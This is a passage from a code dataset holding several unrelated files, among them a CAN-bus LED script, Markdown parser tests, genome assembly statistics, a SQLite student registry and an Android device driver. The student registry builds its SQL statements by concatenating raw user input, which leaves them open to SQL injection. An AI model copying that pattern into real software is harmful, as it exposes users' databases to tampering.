500000\")\ntime.sleep(0.1)\t\n\ntry:\n\tbus = can.interface.Bus(channel='can0', bustype='socketcan_native')\nexcept OSError:\n\tprint('Cannot find PiCAN board.')\n\texit()\n\t\nprint('Ready')\n\ntry:\n\tstrip = Adafruit_DotStar(numpixels, datapin, clockpin, order='gbr'.encode('utf-8'))\n\tstrip.begin()\n\tstrip.setBrightness(brightness)\n\n\twhile True:\n\t\tmessage = bus.recv()\t# Wait until a message is received.\n\n\t\tprint(message.data)\n\t\tprint(range(message.dlc ))\n\n\t\tc = '{0:f} {1:x} {2:x} '.format(message.timestamp, message.arbitration_id, message.dlc)\n\t\ts=''\n\t\tfor i in range(message.dlc ):\n\t\t\ts += '{0:x} '.format(message.data[i])\n\t\t\tprint(message.data[i])\n\t\tprint(' {}'.format(c+s))\n\t\t\n\t\tpointer = message.data[6]\n\t\tprint(pointer)\n\t\tstrip.clear()\n\t\tfor i in range(5):\n\t\t\tstrip.setPixelColor(pointer, 0xFF0000)\n\t\t\tpointer += 1\n\t\tstrip.show()\n\t\nexcept KeyboardInterrupt:\n\t#Catch keyboard interrupt\n\tos.system(\"sudo /sbin/ip link set can0 down\")\n\tprint('\\n\\rKeyboard interrtupt')\t\n\tstrip.clear()\n\tstrip.show()\n\tstrip.close()\n","sub_path":"simple_rx_test_led.py","file_name":"simple_rx_test_led.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"387238515","text":"from unittest import TestCase, mock\nfrom mistletoe.span_token import tokenize_inner, _token_types\nfrom mistletoe.block_token import tokenize\nfrom mistletoe import html_token\nfrom mistletoe.html_renderer import HTMLRenderer\n\nclass TestHTMLToken(TestCase):\n def setUp(self):\n self.renderer = HTMLRenderer()\n self.renderer.__enter__()\n self.addCleanup(self.renderer.__exit__, None, None, None)\n\n def _test_html_token(self, token, token_cls, content):\n self.assertIsInstance(token, token_cls)\n self.assertEqual(token.content, content)\n\n def test_span(self):\n raw = 'some more text'\n tokens = tokenize_inner(raw)\n next(tokens)\n content = 'more'\n self._test_html_token(next(tokens), html_token.HTMLSpan, content)\n next(tokens)\n\n def test_block(self):\n lines = ['
<div>\n',\n '    a paragraph\n',\n 'within an html block\n',\n '</div>\n',\n '    \n']\n token = next(tokenize(lines))\n content = '<div>\n    a paragraph\nwithin an html block\n</div>\n    \n'\n self._test_html_token(token, html_token.HTMLBlock, content)\n\n def test_span_attrs(self):\n raw = '<span class=\"foo\">more</span>'\n token = next(tokenize_inner(raw))\n content = '<span class=\"foo\">more</span>'\n self._test_html_token(token, html_token.HTMLSpan, content)\n\n def test_block_attrs(self):\n lines = ['<div class=\"foo\">\n',\n '    a paragraph\n',\n 'within an html block\n',\n '</div>\n',\n '    \n']\n token = next(tokenize(lines))\n content = '<div class=\"foo\">\n    a paragraph\nwithin an html block\n</div>\n
    \\n'\n self._test_html_token(token, html_token.HTMLBlock, content)\n\n def test_comment(self):\n from mistletoe.block_token import Heading\n lines = ['\\n', '\\n', '# heading 1\\n']\n token1, token2 = tokenize(lines)\n content = '\\n'\n self._test_html_token(token1, html_token.HTMLBlock, content)\n self.assertIsInstance(token2, Heading)\n\n def test_empty_span(self):\n raw = ''\n token = next(tokenize_inner(raw))\n content = ''\n self._test_html_token(token, html_token.HTMLSpan, content)\n\n def test_self_closing_span(self):\n raw = ''\n token = next(tokenize_inner(raw))\n content = ''\n self._test_html_token(token, html_token.HTMLSpan, content)\n\n def test_autolink(self):\n from mistletoe.span_token import AutoLink\n self.assertIsInstance(next(tokenize_inner('')), AutoLink)\n\n","sub_path":"test/test_html_token.py","file_name":"test_html_token.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"257523769","text":"# assessment of assembly - this can be as simple as\n# N50/L50/MAX contig stats\n\nimport sys, os\nfrom Bio import SeqIO\nfrom AAFTF.utility import status\n\n\ndef genome_asm_stats(fasta_file,output_handle):\n\n lengths = []\n # could be smart here and handle compressed files?\n for record in SeqIO.parse(fasta_file, \"fasta\"):\n lengths.append(len(record))\n\n lengths.sort()\n total_len = sum(lengths)\n\n l50 = 0\n n50 = 0\n l90 = 0\n n90 = 0\n cumulsum = 0\n i = 1\n for n in reversed(lengths):\n cumulsum += n\n if n50 == 0 and cumulsum >= total_len * 0.5:\n n50 = n\n l50 = i\n if n90 == 0 and cumulsum >= total_len * 0.9:\n n90 = n\n l90 = i\n \n i += 1\n report = \"Assembly statistics for: %s\\n\" % (fasta_file)\n report += \"%15s = %d\\n\" % ('CONTIG COUNT',len(lengths))\n report += \"%15s = %d\\n\" % ('TOTAL LENGTH',total_len)\n report += \"%15s = %d\\n\" % ('MIN',lengths[0])\n report += \"%15s = %d\\n\" % ('MAX',lengths[-1])\n report += \"%15s = %d\\n\" % ('MEDIAN',lengths[int(len(lengths)/2)])\n report += \"%15s = %.2f\\n\" % ('MEAN', total_len/len(lengths))\n report += \"%15s = %d\\n\" % ('L50', l50)\n report += \"%15s = %d\\n\" % ('N50', n50)\n report += \"%15s = %d\\n\" % ('L90', l90)\n report += \"%15s = %d\\n\" % ('N90', n90)\n \n print(report)\n if output_handle:\n output_handle.write(report)\n\ndef run(parser,args):\n\n if not os.path.exists(args.input):\n status(\"Inputfile %s was not readable, check parameters\" % (args.input))\n\n output_handle=None\n \n if args.report:\n output_handle = open(args.report,\"w\")\n\n genome_asm_stats(args.input, output_handle)\n \n","sub_path":"AAFTF/assess.py","file_name":"assess.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"65508409","text":"import unittest\n\nfrom core.evsrc import EvSrc\nfrom plugins.simpledirectorywatcher import SimpleDirectoryWatcher\n\nfrom os import unlink\nfrom tempfile import mkstemp\n\nOPTS = { 'debug' : False }\n\nclass TestSimpleDirectoryWatcher(unittest.TestCase):\n def setUp(self):\n self._evsrc = EvSrc(**OPTS)\n self._source = SimpleDirectoryWatcher('/tmp')\n self._evsrc.add(self._source)\n\n def test_added(self):\n self._added_ok = False\n self._evsrc.connect(self._added_cb, signal = 'file-added')\n\n self._evsrc.step()\n self._test_file = mkstemp(dir='/tmp')[1]\n self._evsrc.step()\n\n self.assertTrue(self._added_ok)\n\n def test_removed(self):\n self._removed_ok = False\n 
self._evsrc.connect(self._removed_cb, signal = 'file-removed')\n\n self._test_file = mkstemp(dir='/tmp')[1]\n self._evsrc.step()\n unlink(self._test_file) \n self._evsrc.step()\n\n self.assertTrue(self._removed_ok)\n\n def _added_cb(self, **kwargs):\n if kwargs.get('path') == self._test_file:\n self._added_ok = True\n\n def _removed_cb(self, **kwargs):\n if kwargs.get('path') == self._test_file:\n self._removed_ok = True\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/simpledirectorywatcher.py","file_name":"simpledirectorywatcher.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"284865033","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\n__author__ = 'Dylan'\n\n__all__ = [\n 'fixture'\n]\n\nimport collections\nimport copy\nimport datetime\nimport random\nimport string\nimport time\n\nimport faker\n\ndatetime_fmt = '%Y-%m-%dT%H:%M:%SZ'\ndate_fmt = '%Y-%m-%d'\n\n\nclass BaseFixture(object):\n fake = faker.Factory.create('zh_CN')\n\n fake.datetime = lambda pattern: datetime.datetime.strptime(faker.Factory.create().\n date(pattern=datetime_fmt), datetime_fmt)\n fake.date = lambda: datetime.datetime.strptime(faker.Factory.create().date(pattern=date_fmt), date_fmt)\n fake.random_float = lambda *args, **kwargs: float(faker.Factory.create().random_int(*args, **kwargs))\n\n fake.email = lambda: 'email.{n}@gmail.com'.format(n=random.randint(0, 999))\n\n fake.name = lambda: ''.join(random.sample(string.ascii_lowercase, 4))\n\n fake.id = lambda: random.randint(1, int(time.time() / 365))\n\n @property\n def dummy_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.text()[:128],\n }\n\n @property\n def dummy_user_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.name(),\n 'password': self.fake.text()[:16],\n }\n\n @property\n def dummy_profile_fixture(self):\n return {\n 'id': self.fake.id(),\n 'screen_name': self.fake.name(),\n 'birth': self.fake.date(),\n }\n\n @property\n def dummy_address_fixture(self):\n return {\n 'id': self.fake.id(),\n 'country': self.fake.country(),\n 'province': self.fake.city(),\n 'city': self.fake.city(),\n 'district': self.fake.city_suffix(),\n 'line': self.fake.street_address(),\n 'post': self.fake.postcode(),\n }\n\n @property\n def dummy_role_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.name(),\n }\n\n @property\n def dummy_permission_fixture(self):\n return {\n 'id': self.fake.id(),\n 'name': self.fake.name(),\n }\n\n @property\n def dummy_role_permission_fixture(self):\n return {\n 'id': self.fake.id(),\n 'role_id': self.fake.id(),\n 'permission_id': self.fake.id(),\n 'extra_data': self.fake.name(),\n }\n\n def update_with_default_field_values(self, fixture, **field_values):\n for field, value in field_values.items():\n if isinstance(value, collections.Callable):\n fixture[field] = value()\n elif value is None:\n fixture.pop(field, None)\n else:\n fixture[field] = value\n\n def generate_fixture(self, entity, **field_values):\n assert entity, 'entity could not be empty or none'\n assert isinstance(entity, str), 'entity must be an instance of str'\n result = copy.deepcopy(getattr(self, '{0}_fixture'.format(entity)))\n if result:\n self.update_with_default_field_values(result, **field_values)\n return result\n assert '{0}_fixture not found!'.format(entity)\n\n\ndef fixture(entity, **named):\n return BaseFixture().generate_fixture(entity, 
**named)\n","sub_path":"api/tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"175181750","text":"from tkinter import * \r\n \r\ntop = Tk() \r\n \r\ntop.geometry(\"500x500\") \r\n \r\n#creating a simple canvas \r\nc = Canvas(top,bg = \"pink\",height = \"800\",width=\"800\") \r\nlistx=[50,55,60,65,70,75,80]\r\nlisty=[50,55,60,65,70,75,80]\r\n# draw a small dot at each (x, y) coordinate pair\r\nfor x, y in zip(listx, listy):\r\n    c.create_text(x,y,fill=\"darkblue\",font=\"Times 20 italic bold\",text=\".\")\r\n \r\nc.pack() \r\n \r\ntop.mainloop() ","sub_path":"VSCode Projects/python projects/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"309625197","text":"from rest_framework import permissions\n\nfrom django.contrib.auth import get_user_model\n\nclass IsOwnerOrAdmin(permissions.BasePermission):\n def has_object_permission(self, request, view, timezone_obj):\n return request.user.is_superuser or timezone_obj.user == request.user\n\nclass IsNotCrossOriginOrIsSuperUser(permissions.BasePermission):\n def has_permission(self, request, view):\n custom_user = request.GET.get('username')\n\n if not custom_user or custom_user == request.user.get_username():\n # request is not cross origin\n return True\n\n if not request.user.is_superuser:\n return False\n\n custom_user_objs = get_user_model().objects.filter(username=custom_user)\n\n # user with name in query param not found\n if not custom_user_objs:\n return False\n\n # user with name in query param is superuser\n return not custom_user_objs[0].is_superuser\n\n\n\n","sub_path":"django/src/timezone/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"628396974","text":"def menu():\r\n import os, sys\r\n print(\"************** Acceso al Sistema de Telecomunicaciones **************\")\r\n print(\"\")\r\n print(\"1.- Agregar alumnos: \")\r\n print(\"2.- Mostrar lista de alumnos: \")\r\n print(\"3.- Clasificarlos segun su año: \")\r\n print(\"4.- Modificar lista de alumnos\")\r\n print(\"5.- Salir\")\r\n try:\r\n op=int(input(\"Introduzca el numero de la opcion deseada: \"))\r\n except:\r\n print(\"Esto no es un numero, por favor elija algun numero de las opciones mostradas\")\r\n print(\"\")\r\n menu()\r\n os.system(\"cls\")\r\n if op==1:\r\n agregar()\r\n elif op==2:\r\n ver()\r\n elif op==3:\r\n clasificar()\r\n elif op==4:\r\n modificar()\r\n elif op==5:\r\n salir()\r\n else:\r\n print(\"Por favor digite un numero de los mencionados en la opcion\")\r\n menu()\r\n \r\ndef agregar():\r\n import os,sys,sqlite3\r\n con = sqlite3.connect('partes.s3db')\r\n print(\"Estas en el menu agregado\")\r\n print(\"\")\r\n\r\n name=input(\"Digite el nombre completo del Alumno: \")\r\n cui=input(\"Digite el cui del Alumno: \")\r\n os.system(\"cls\")\r\n cursor=con.cursor()\r\n cursor.execute(\"insert into grado (Nombre, Cui) values('\"+name+\"','\"+cui+\"')\")\r\n con.commit()\r\n con.close()\r\n menu()\r\ndef modificar():\r\n import os, sys, sqlite3\r\n grad=[]\r\n con=sqlite3.connect('partes.s3db')\r\n cursor=con.cursor()\r\n cursor.execute(\"select * from grado\")\r\n print(\"Estas en la opcion modificar alumnos\")\r\n print(\"\")\r\n print(\"\\t Cod \\t Nombre \\t CUI\")\r\n print(\"***************************************************************** 
\")\r\n for grado in cursor:\r\n grad.append(grado)\r\n # build the display string in a separate variable so the row list survives\r\n linea='\t'+str(grado[0])+'\t'+str(grado[1])+'\t'+str(grado[2])\r\n print(linea)\r\n print('')\r\n cod=input(\"DIGITE EL CODIGO DEL ALUMNO A MODIFICAR: \")\r\n global nombre\r\n global cui\r\n for grado in grad:\r\n if int(grado[0])==int(cod):\r\n nombre=grado[1]\r\n cui=grado[2]\r\n encontrado=True\r\n break\r\n \r\n nombre=input(\"Digite el nombre nuevo\"+nombre+\": \")\r\n cui=input(\"Digite el CUI nuevo\"+str(cui)+\": \")\r\n sql=\"update grado set Nombre='\"+nombre+\"', CUI='\"+cui+\"' where Cod =\"+cod\r\n cursor.execute(sql)\r\n con.commit()\r\n con.close()\r\n os.system(\"cls\")\r\n print(\"El alumno ha sido modificado\")\r\n print(\"\")\r\n menu()\r\n \r\ndef ver():\r\n import os, sys, sqlite3\r\n con = sqlite3.connect('partes.s3db')\r\n cursor=con.cursor()\r\n cursor.execute(\"select * from grado\")\r\n print(\"Estas en la opcion ver alumnos\")\r\n print(\"\")\r\n print(\"\\t Cod \\t Nombre \\t CUI\")\r\n print(\"***************************************************************** \")\r\n for grado in cursor:\r\n grad='\t'+str(grado[0])+'\t'+str(grado[1])+'\t'+str(grado[2])\r\n print(str(grad))\r\n con.close()\r\n print('')\r\n menu()\r\ndef salir():\r\n import sys\r\n res=input(\"Esta seguro que desea salir? SI/NO: \")\r\n if(res.lower()==\"no\"):\r\n menu()\r\n elif(res.lower()==\"si\"):\r\n import sys\r\n sys.exit(2)\r\n \r\nmenu()\r\n","sub_path":"escuela.py","file_name":"escuela.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"307726322","text":"''' Explains list comprehension which is much faster than looping through list '''\n''' The general method is this ' mylist = [ SOME_EXPRESSION_WITH_i for i in ITERABLE_LIST ] '\n'''\n# Loop (slow)\niterer = list(range(10))\ndouble = list(range(10))\n\nmylist = []\nfor i in iterer:\n mylist.append(i+1)\n\nprint('Loop result',mylist)\n# List Comprehension (fast)\nmylist = [ i+1 for i in iterer]\nprint('List comprehension result',mylist)\n\n\n","sub_path":"ListComprehension.py","file_name":"ListComprehension.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"210445372","text":"import rhinoscriptsyntax as rs\n\n__author__ = \"C\"\n__version__ = \"2019.08.14\"\n__commandname__ = \"SDQT\"\n\n# RunCommand is called when the user enters the command name in Rhino.\n# The command name is defined by the filename minus \"_cmd.py\"\ndef RunCommand( is_interactive ):\n # this script can turn off layers of your selected object\n\n rs.AddLayer(\"_t\")\n rs.CurrentLayer(\"_t\")\n\n Layers = []\n CurObjLayNames=[]\n CurObjLayParentNames=[]\n\n for layer in rs.LayerNames():\n if not rs.IsLayerLocked(layer):\n Layers.extend([layer])\n \n Layers = list(dict.fromkeys(Layers))\n\n\n\n CurObjs = rs.GetObjects(\"select object to keep layers on\")\n\n for CurObj in CurObjs:\n CurObjLayId = rs.ObjectLayer(CurObj)\n CurObjLayName = rs.LayerName(CurObjLayId, fullpath=True)\n CurObjLayNames.extend([CurObjLayName])\n CurObjLayNames = list(dict.fromkeys(CurObjLayNames))\n \n\n for name in CurObjLayNames:\n for layer in Layers:\n if rs.IsLayerParentOf(name,layer):\n CurObjLayParentNames.extend([layer])\n \n CurObjLayParentNames = list(dict.fromkeys(CurObjLayParentNames))\n\n layList = CurObjLayNames + CurObjLayParentNames\n\n i =0\n for layer in Layers:\n if layer not in layList and layer != \"_t\":\n 
rs.LayerLocked(layer,True)\r\n i += 1\r\n\r\n rs.MessageBox(str(i) + \" layers Locked\" , 0 , title=\"SDQT_Sandelions\")\r\n\r\n return 0\r\n","sub_path":"_cmd.py/SDQT_cmd.py","file_name":"SDQT_cmd.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"}
{"seq_id":"104367241","text":"import window\r\nfrom random import randint\r\nfrom quad import Quad\r\nfrom pygame.display import flip\r\nfrom pygame.time import Clock\r\nfrom OpenGL.GL import *\r\nfrom var import *\r\n\r\nwindow.window()\r\nevents=window.event_hendler\r\nfps=Clock()\r\nquads=[]\r\nquads_x={}\r\nquads_y={}\r\nfor i in range(QUAD_SPAWN):\r\n quads.append(Quad(randint(-960+QUAD_SIZE,960-QUAD_SIZE),randint(-540+QUAD_SIZE,540-QUAD_SIZE),i,i,[randint(-10000,10000)/10000,randint(-10000,10000)/10000]))\r\n quads_x.update({i:quads[i].x})\r\n quads_y.update({i:quads[i].y})\r\n\r\n'''def check_colisions(quads,quads_x,quads_y):\r\n for quad in quads:\r\n if quad.x+QUAD_SIZE<=list(quads_x.values())[quad.i_x+1] or quad.x-QUAD_SIZE<=list(quads_x.values())[quad.i_x-1]:\r\n pass\r\n if quad.y+QUAD_SIZE<=list(quads_y.values())[quad.i_y+1] or quad.y-QUAD_SIZE<=list(quads_y.values())[quad.i_y-1]:\r\n pass'''\r\n\r\n\r\n\r\n\r\ndef check_border(quads,quad_x_min,quad_x_max,quad_y_min,quad_y_max):\r\n if quads[quad_x_min].x<=-960+QUAD_SIZE:\r\n quads[quad_x_min].smer[0] = -quads[quad_x_min].smer[0]\r\n quads[quad_x_min].move()\r\n if quads[quad_x_max].x>=960-QUAD_SIZE:\r\n quads[quad_x_max].smer[0] = -quads[quad_x_max].smer[0]\r\n quads[quad_x_max].move()\r\n if quads[quad_y_min].y<=-540+QUAD_SIZE:\r\n quads[quad_y_min].smer[1] = -quads[quad_y_min].smer[1]\r\n quads[quad_y_min].move()\r\n if quads[quad_y_max].y>=540-QUAD_SIZE:\r\n quads[quad_y_max].smer[1] = -quads[quad_y_max].smer[1]\r\n quads[quad_y_max].move()\r\n\r\ndef sort_x(quads_x):\r\n return {key: value for key, value in sorted(quads_x.items(), key=lambda item: item[1])}\r\n\r\ndef sort_y(quads_y):\r\n return {key: value for key, value in sorted(quads_y.items(), key=lambda item: item[1])}\r\n\r\ndef update(quads, quads_x, quads_y):\r\n quads_x = {}\r\n quads_y = {}\r\n for i in range(QUAD_SPAWN):\r\n quads_x.update({i: quads[i].x})\r\n quads_y.update({i: quads[i].y})\r\n quads_x=sort_x(quads_x)\r\n quads_y=sort_y(quads_y)\r\n return (quads_x, quads_y)\r\n\r\ndef draw():\r\n for quad in quads:\r\n quad.draw()\r\n flip()\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n\r\nwhile True:\r\n events()\r\n draw()\r\n for quad in quads:\r\n quad.move()\r\n quads_x, quads_y=update(quads,quads_x,quads_y)\r\n check_border(quads,int(list(quads_x.keys())[0]),int(list(quads_x.keys())[len(quads_x)-1]),int(list(quads_y.keys())[0]),int(list(quads_y.keys())[len(quads_y)-1]))\r\n fps.tick(120)","sub_path":"Tauchen/18.12.2019/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
{"seq_id":"456388821","text":"# Copyright 2013-2015 ARM Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific 
language governing permissions and\n# limitations under the License.\n#\n\n# pylint: disable=E1101\nimport os\nimport sys\nimport re\nimport time\nimport tempfile\nimport shutil\nimport threading\nimport json\nimport xml.dom.minidom\nfrom subprocess import CalledProcessError\n\nfrom wlauto.core.extension import Parameter\nfrom wlauto.common.resources import Executable\nfrom wlauto.core.resource import NO_ONE\nfrom wlauto.common.linux.device import BaseLinuxDevice, PsEntry\nfrom wlauto.exceptions import DeviceError, WorkerThreadError, TimeoutError, DeviceNotRespondingError\nfrom wlauto.utils.misc import convert_new_lines, ABI_MAP, commonprefix\nfrom wlauto.utils.types import boolean, regex\nfrom wlauto.utils.android import (adb_shell, adb_background_shell, adb_list_devices,\n adb_command, AndroidProperties, ANDROID_VERSION_MAP)\n\n\nSCREEN_STATE_REGEX = re.compile('(?:mPowerState|mScreenOn|Display Power: state)=([0-9]+|true|false|ON|OFF)', re.I)\nSCREEN_SIZE_REGEX = re.compile(r'mUnrestrictedScreen=\\(\\d+,\\d+\\)\\s+(?P\\d+)x(?P\\d+)')\n\n\nclass AndroidDevice(BaseLinuxDevice): # pylint: disable=W0223\n \"\"\"\n Device running Android OS.\n\n \"\"\"\n\n platform = 'android'\n\n parameters = [\n Parameter('adb_name',\n description='The unique ID of the device as output by \"adb devices\".'),\n Parameter('android_prompt', kind=regex, default=re.compile('^.*(shell|root)@.*:/\\S* [#$] ', re.MULTILINE),\n description='The format of matching the shell prompt in Android.'),\n Parameter('working_directory', default='/sdcard/wa-working', override=True),\n Parameter('binaries_directory', default='/data/local/tmp/wa-bin', override=True,\n description='Location of binaries on the device.'),\n Parameter('package_data_directory', default='/data/data',\n description='Location of of data for an installed package (APK).'),\n Parameter('external_storage_directory', default='/sdcard',\n description='Mount point for external storage.'),\n Parameter('connection', default='usb', allowed_values=['usb', 'ethernet'],\n description='Specified the nature of adb connection.'),\n Parameter('logcat_poll_period', kind=int,\n description=\"\"\"\n If specified and is not ``0``, logcat will be polled every\n ``logcat_poll_period`` seconds, and buffered on the host. This\n can be used if a lot of output is expected in logcat and the fixed\n logcat buffer on the device is not big enough. The trade off is that\n this introduces some minor runtime overhead. Not set by default.\n \"\"\"),\n Parameter('enable_screen_check', kind=boolean, default=False,\n description=\"\"\"\n Specified whether the device should make sure that the screen is on\n during initialization.\n \"\"\"),\n Parameter('swipe_to_unlock', kind=str, default=None,\n allowed_values=[None, \"horizontal\", \"vertical\"],\n description=\"\"\"\n If set a swipe of the specified direction will be performed.\n This should unlock the screen.\n \"\"\"),\n ]\n\n default_timeout = 30\n delay = 2\n long_delay = 3 * delay\n ready_timeout = 60\n\n # Overwritten from Device. 
For documentation, see corresponding method in\n # Device.\n\n @property\n def is_rooted(self):\n if self._is_rooted is None:\n try:\n result = adb_shell(self.adb_name, 'su', timeout=1)\n if 'not found' in result:\n self._is_rooted = False\n else:\n self._is_rooted = True\n except TimeoutError:\n self._is_rooted = True\n except DeviceError:\n self._is_rooted = False\n return self._is_rooted\n\n @property\n def abi(self):\n val = self.getprop()['ro.product.cpu.abi'].split('-')[0]\n for abi, architectures in ABI_MAP.iteritems():\n if val in architectures:\n return abi\n return val\n\n @property\n def supported_abi(self):\n props = self.getprop()\n result = [props['ro.product.cpu.abi']]\n if 'ro.product.cpu.abi2' in props:\n result.append(props['ro.product.cpu.abi2'])\n if 'ro.product.cpu.abilist' in props:\n for abi in props['ro.product.cpu.abilist'].split(','):\n if abi not in result:\n result.append(abi)\n\n mapped_result = []\n for supported_abi in result:\n for abi, architectures in ABI_MAP.iteritems():\n found = False\n if supported_abi in architectures and abi not in mapped_result:\n mapped_result.append(abi)\n found = True\n break\n if not found and supported_abi not in mapped_result:\n mapped_result.append(supported_abi)\n return mapped_result\n\n def __init__(self, **kwargs):\n super(AndroidDevice, self).__init__(**kwargs)\n self._logcat_poller = None\n\n def reset(self):\n self._is_ready = False\n self._just_rebooted = True\n adb_command(self.adb_name, 'reboot', timeout=self.default_timeout)\n\n def hard_reset(self):\n super(AndroidDevice, self).hard_reset()\n self._is_ready = False\n self._just_rebooted = True\n\n def boot(self, hard=False, **kwargs):\n if hard:\n self.hard_reset()\n else:\n self.reset()\n\n def connect(self): # NOQA pylint: disable=R0912\n iteration_number = 0\n max_iterations = self.ready_timeout / self.delay\n available = False\n self.logger.debug('Polling for device {}...'.format(self.adb_name))\n while iteration_number < max_iterations:\n devices = adb_list_devices()\n if self.adb_name:\n for device in devices:\n if device.name == self.adb_name and device.status != 'offline':\n available = True\n else: # adb_name not set\n if len(devices) == 1:\n available = True\n elif len(devices) > 1:\n raise DeviceError('More than one device is connected and adb_name is not set.')\n\n if available:\n break\n else:\n time.sleep(self.delay)\n iteration_number += 1\n else:\n raise DeviceError('Could not boot {} ({}).'.format(self.name, self.adb_name))\n\n while iteration_number < max_iterations:\n available = (int('0' + (adb_shell(self.adb_name, 'getprop sys.boot_completed', timeout=self.default_timeout))) == 1)\n if available:\n break\n else:\n time.sleep(self.delay)\n iteration_number += 1\n else:\n raise DeviceError('Could not boot {} ({}).'.format(self.name, self.adb_name))\n\n if self._just_rebooted:\n self.logger.debug('Waiting for boot to complete...')\n # On some devices, adb connection gets reset some time after booting.\n # This causes errors during execution. To prevent this, open a shell\n # session and wait for it to be killed. 
Once its killed, give adb\n # enough time to restart, and then the device should be ready.\n # TODO: This is more of a work-around rather than an actual solution.\n # Need to figure out what is going on the \"proper\" way of handling it.\n try:\n adb_shell(self.adb_name, '', timeout=20)\n time.sleep(5) # give adb time to re-initialize\n except TimeoutError:\n pass # timed out waiting for the session to be killed -- assume not going to be.\n\n self.logger.debug('Boot completed.')\n self._just_rebooted = False\n self._is_ready = True\n\n def initialize(self, context):\n self.sqlite = self.deploy_sqlite3(context) # pylint: disable=attribute-defined-outside-init\n if self.is_rooted:\n self.disable_screen_lock()\n self.disable_selinux()\n if self.enable_screen_check:\n self.ensure_screen_is_on()\n\n def disconnect(self):\n if self._logcat_poller:\n self._logcat_poller.close()\n\n def ping(self):\n try:\n # May be triggered inside initialize()\n adb_shell(self.adb_name, 'ls /', timeout=10)\n except (TimeoutError, CalledProcessError):\n raise DeviceNotRespondingError(self.adb_name or self.name)\n\n def start(self):\n if self.logcat_poll_period:\n if self._logcat_poller:\n self._logcat_poller.close()\n self._logcat_poller = _LogcatPoller(self, self.logcat_poll_period, timeout=self.default_timeout)\n self._logcat_poller.start()\n\n def stop(self):\n if self._logcat_poller:\n self._logcat_poller.stop()\n\n def get_android_version(self):\n return ANDROID_VERSION_MAP.get(self.get_sdk_version(), None)\n\n def get_android_id(self):\n \"\"\"\n Get the device's ANDROID_ID. Which is\n\n \"A 64-bit number (as a hex string) that is randomly generated when the user\n first sets up the device and should remain constant for the lifetime of the\n user's device.\"\n\n .. note:: This will get reset on userdata erasure.\n\n \"\"\"\n output = self.execute('content query --uri content://settings/secure --projection value --where \"name=\\'android_id\\'\"').strip()\n return output.split('value=')[-1]\n\n def get_sdk_version(self):\n try:\n return int(self.getprop('ro.build.version.sdk'))\n except (ValueError, TypeError):\n return None\n\n def get_installed_package_version(self, package):\n \"\"\"\n Returns the version (versionName) of the specified package if it is installed\n on the device, or ``None`` otherwise.\n\n Added in version 2.1.4\n\n \"\"\"\n output = self.execute('dumpsys package {}'.format(package))\n for line in convert_new_lines(output).split('\\n'):\n if 'versionName' in line:\n return line.split('=', 1)[1]\n return None\n\n def get_installed_package_abi(self, package):\n \"\"\"\n Returns the primary abi of the specified package if it is installed\n on the device, or ``None`` otherwise.\n \"\"\"\n output = self.execute('dumpsys package {}'.format(package))\n val = None\n for line in convert_new_lines(output).split('\\n'):\n if 'primaryCpuAbi' in line:\n val = line.split('=', 1)[1]\n break\n if val == 'null':\n return None\n for abi, architectures in ABI_MAP.iteritems():\n if val in architectures:\n return abi\n return val\n\n def list_packages(self):\n \"\"\"\n List packages installed on the device.\n\n Added in version 2.1.4\n\n \"\"\"\n output = self.execute('pm list packages')\n output = output.replace('package:', '')\n return output.split()\n\n def package_is_installed(self, package_name):\n \"\"\"\n Returns ``True`` the if a package with the specified name is installed on\n the device, and ``False`` otherwise.\n\n Added in version 2.1.4\n\n \"\"\"\n return package_name in self.list_packages()\n\n 
